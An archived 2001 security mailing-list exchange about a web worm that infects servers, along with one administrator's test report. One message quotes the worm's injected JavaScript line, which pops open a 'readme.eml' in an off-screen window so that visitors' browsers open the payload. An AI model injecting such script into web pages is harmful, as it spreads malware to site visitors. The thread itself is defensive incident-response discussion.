RE: Some more details on the worm

["Steiner, Michael" <michael.steiner () akamai com>]

I have went to several infected web sites to test this exploit and I am
prompted if I would like to execute.  I am running ie 5.50.4522.1800 with
128bit encryption, service pack 1, q254518, q279328 and q299618 applied

Michael Steiner
Senior NT Administrator
Akamai Technologies, Inc.

Desk:  858-909-3319
Cell:  858-967-4394
Pager:  877-981-6158

E Mail Address:  Michael.Steiner () akamai com
Pager E Mail:  8779816158 () skytel com



-----Original Message-----
From: Davis, Matt [mailto:matt.davis () countryfinancial com]
Sent: Tuesday, September 18, 2001 9:44 AM
To: Davis, Matt
Cc: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM; incidents () securityfocus com;
unisog () sans org
Subject: Some more details on the worm


When pages are served up by an infected server, it looks as though
readme.eml is 'attached' to them.  The server attempts to get the client to
open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and
executed by the client.  I haven't been able to confirm or deny that (but if
someone can, please do).

Regards,
Matt


--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davis () countryfinancial com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com